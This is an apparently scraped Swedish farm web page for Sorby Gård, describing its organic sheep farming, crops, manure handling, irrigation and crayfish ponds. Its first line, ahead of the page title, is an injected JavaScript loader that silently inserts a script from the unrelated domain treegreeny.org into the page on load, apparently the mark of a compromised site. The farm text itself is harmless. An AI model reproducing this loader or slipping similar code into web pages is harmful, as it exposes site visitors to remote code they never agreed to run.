;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Lantbruk | Sorby Gård

Lantbruk

Ekologisk Produktion

Sedan 1996 är hela gården omställd till ekologisk produktion. Det innebär att vi inte använder handelsgödsel eller kemisk bekämpning. Gården är ansluten till KRAV.

Köttproduktion

På gården finns cirka 300 tackor av rasen Gotlandsfår samt cirka 150 korsningstackor av Köttras, företrädesvis Finull & Dorset samt Finull & Suffolk.

Tackorna lammar i en stor ligghall. Lammen tillbringar sina första dagar i en liten box med tackan, innan de släpps ut på parasitfritt bete.

Tackor och lamm går sedan i olika grupper under sommaren tills avskiljning sker i början av augusti. Vårt mål år att sälja slaktfärdiga Gotlandslamm under hösten, samt föda upp övriga lamm till vinterlamm, för försäljning under våren. Målsättningen är att uppnå 90 % lamm av märkeskvalitét, med slaktvikt 18 – 22 kg och lägst R- köttkvalitet. Lammköttet säljs som KRAV-kött, via Gotlands Slagteri, mestadels till Stockholm.

Skinnen tar vi hem efter beredning hos Donnia i Tranås och säljer i vår Gårdsbutik. Där säljer vi också en del utvalt lammkött från vår egen produktion.

Växtodling

Större delen av gårdens areal är slåtter- och betesvallar, ca 45 hektar vall omsätts varje år genom ny vallinsådd. Idag odlas även Höstraps, Foderärtor, Höstvete och Vårkorn på gården.

Gödsling

Stallgödsel från ligghallarna läggs upp som tillfälligt upplag under maj månad och sprids sedan under oktober-november månad i samband med plöjning och höstsådd.

Under våren sprids KRAV-godkända gödselmedel på en stor del av gårdens spannmålsodlingar.

Bevattning

På cirka 100 hektar av gårdens areal finns möjlighet till konstbevattning.
Bevattningen sker från en ca 3 ha stor grävd damm, där ytvatten från diken och kanaler pumpas in under vinterhalvåret.

Kräftodling

1984 planterade vi, tillsammans med bokhandlare Gunnar Pettersson i Visby, in kräftor i bevattningsdammen. Det visade sig att de trivdes över förväntan och förökade sig därefter. Efter några år kunde vi börja sälja av kräftskörden och beslöt bygga fler kräftdammar. 8 ”diken” som mäter ca: 6 x 80 meter grävdes år 1988 . Något år senare grävdes ytterligare två dammar. I samtliga dammar har vi planterat in flodkräftor från den stora bevattningsdammen.

Vi har fått stöd av Europeiska jordbruksfonden för landsbygdsutveckling (landsbygdsfonden) och kan tack vare det utveckla vår miljövänliga satsning på solcellspaneler på Sorby Gård.